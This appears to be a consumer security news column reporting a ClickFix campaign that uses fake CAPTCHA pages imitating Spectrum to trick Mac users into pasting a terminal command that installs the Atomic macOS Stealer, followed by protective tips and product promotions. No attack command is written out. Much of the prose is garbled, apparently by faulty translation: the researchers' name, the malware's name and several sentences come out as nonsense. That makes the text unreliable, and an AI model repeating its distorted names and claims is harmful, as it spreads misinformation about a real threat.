Malware addresses Mac users with Fake Captcha and Amos Stealer
NEWNow you can listen to News articles!
Clickfix, a social engineering tactic that has been aimed at Windows and Mac users since the beginning of 2024, continues to evolve.
Last month, I reported how the attackers were using fake captchas for Enter Windows users to install malware themselves.
Now, that same trick is turning against macOS. Cyber security researchers have discovered a new campaign using Clickfix to deliver Macos Atomic Macos (AMOS), a powerful malware that steals information for Apple systems.
Spot Fake Online, Avoid Facebook Subscription Scams
Illustration of a hacker at work. (Kurt “Cyberguy” Knutsson)
What is the Malware Clickfix and how does it work?
Security researchers in Cloud sinus They have identified a new threat aimed at macOS users through imitation and deception. The campaign uses a technique known as Clickfix to attract victims through false online verification indications. This time, the attackers are falsifying Spectrum, an important telecommunications provider in the United States. They use fraudulent domains that are very similar to the real support portals of Spectrum. These include deceptive addresses such as Spectrum Net and Spectrum Ticket Net panel.
Visitors of these sites are shown a standard -looking captcha box, asking them to verify their identity. When they do, the site shows a false error message that says the Captcha failed. Users are encouraged to click on a “alternative verification” button. This triggers a command to be silent to its clipboard. What happens below depends on the user operating system. In macOS, the instructions guide the user to paste and execute the command in the terminal. That command is actually a Shell script designed to steal information and download malware.
The script is particularly dangerous because it uses legitimate macious system commands. Ask for the system password, collect credentials and disable security protections. Then download masters. This is an information stole known with a history of aiming Apple devices. Malware collects confidential data such as passwords, cryptocurrency wallet keys, browser autofill data and saved cookies.
Researchers believe the campaign was created by Russian -speaking attackers. The clues include comments written in Russian that are within the malware code. Analysts also pointed out that the delivery infrastructure was poorly assembled. The non -matching instructions appeared among the devices. For example, Linux users were Windows commands. Mac users were told to press keys that only exist in Windows machines.
Register for my free Cyberguy report
Get my best technological tips, urgent security alerts and exclusive offers delivered directly to your inbox. In addition, you will get instant access to my definitive scam survival guide, free when you join.
False captcha in a Mac. (Cloudsek)
Hackers who are to steal their identity
Why clickfix attacks are so effective
Clickfix is a social engineering method that has quickly gained popularity among cybercriminals. It is based on the fact that users trust what they see and follow simple instructions. In this campaign, the goal of the attacker is to make the victim execute the infection process themselves. Once the user continues, the system is compromised without the need for a traditional exploit.
The researchers believe that Clickfix has been active since at least March 2024. I first reported it in June 2024, when The attackers used false error messages From Google Chrome, Microsoft Word and OneDrive to boost their useful loads. The indicated victims were shown to offer a “solution”, which copied a Powershell malicious command to its clipboard. They were then told to be hit and executed in Powershell or by running dialogue.
By November 2024, the method had evolved even more. TO New wave of attacks aimed at Google Meet usersstarting with the emoros of Phishing that imitated the invitations of internal meetings. These emails contained links that redirected to falsify destination pages designed to seem that they came from the victim’s organization.
False captcha in a Mac. (Cloudsek)
Malware exposes 3.9 billion passwords in a great threat of cybersecurity
6 ways to protect yourself from clickfix and similar malware
To protect themselves from the evolutionary threat of clickfix malware, which continues to address users through sophisticated social engineering tactics, consider implementing these six essential security measures:
1. Be skeptical of the captcha indications: Legitimate captcha tests never require you to hit anything in the terminal. If a website tells you to do this, it is likely to be a scam. Close the page immediately and avoid interacting with it.
2. Do not click links from emails not verified and use strong antivirus software: Many Clickfix attacks also begin with phishing emails that are passed through trusted services such as Booking.com or Google Meet. Always check the sender before clicking on the links. If an email seems urgent or unexpected, go directly to the company’s official website instead of clicking any link inside the email.
The best way to safeguard the malicious links that install malware, which potentially access their private information, is to have strong antivirus software installed on all its devices. This protection can also alert it to the PHISHING Electronic Correos and Ransomware scams, maintaining their personal information and their safe digital assets. Get my elections for the best antivirus protection winners 2025 for your Windows, Mac, Android and iOS devices.
3. Enable two factors authentication: Allow two factors authentication whenever possible. This adds an additional security layer when requiring a second form of verification, such as a code sent to your phone, in addition to your password.
Get the News business on the fly by clicking here
4. Keep updated devices: Regularly Update of your operating system, browser and safety software He assures that he has the last patches against known vulnerabilities. Cybercounts exploit obsolete systems, so allowing automatic updates is a simple but effective way to stay protected.
5. Monitor your accounts for suspicious activity and change your passwords: If you have interacted with a suspicious website, a Phishing email or a false login page, see your online accounts to obtain any unusual activity. Look for unexpected login attempts, unauthorized password remains or financial transactions that do not recognize. If something seems off, change your passwords immediately and report the activity to the relevant service provider. In addition, consider using a Password administrator to generate and store complex passwords. Get more details about me The best password administrators reviewed by experts from 2025 here.
6. Invest in the personal data elimination service: Consider using a service that monitors your personal information and alerts it to possible infractions or the unauthorized use of your data. These services can provide early warning signals of identity theft or other malicious activities resulting from clickfix or similar attacks. While no service promises to eliminate all its Internet data, having an elimination service is excellent if you want to constantly monitor and automate the process of eliminating your information from hundreds of sites continuously for a longer period of time. See my best selections to obtain data disposal services here.
Get a free scan To find out if your personal information is now available on the web
The mass security failure puts most popular browsers at risk in Mac
Kurt key takeway
Even experienced users can be deceived when malicious behavior disguises routine. The attack not only exploited a vulnerability in macOS, but also its familiarity with verification flows. While security instructions seem part of the usual experience, people will continue to execute the malicious code themselves. Mac users, like everyone else, need to treat each family -looking interface with a little more skepticism. Especially when you request your password.
Click here to get the News application
Do you think technological companies are doing enough to stop malware as clickfix? Get us knowing in Cyberguy.com/contact.
To obtain more technological tips and safety alerts, subscribe to my free Cyberguy Report newsletter when you head Cyberguy.com/newsletter
Ask Kurt or tell us what stories you would like us to cover.
Follow Kurt in his social channels
- YouTube
Answers to Cyberguys most facts:
- What is the best way to protect your MAC devices, Windows, iPhone and Android to be pirate?
- What is the best way to stay private, safe and anonymous while navigating the web?
- How can I get rid of robocalls with data elimination applications and services?
- How do I eliminate my private internet data?
New Kurt:
- Try the new Cyberguy games (crosswords, words searches, trivia and more!)
- Cyberguy exclusive coupons and offers
Copyright 2025 Cyberguy.com. All rights reserved.
Kurt “Cyberguy” Knutsson is a award -winning technological journalist who has a deep love for technology, equipment and devices that improve life with their contributions for News & News Business Startzing Mornings in “News & Friends”. Do you have a technological question? Get the free Kurt’s free newsletter, share your voice, an idea of the story or comment on Cyberguy.com.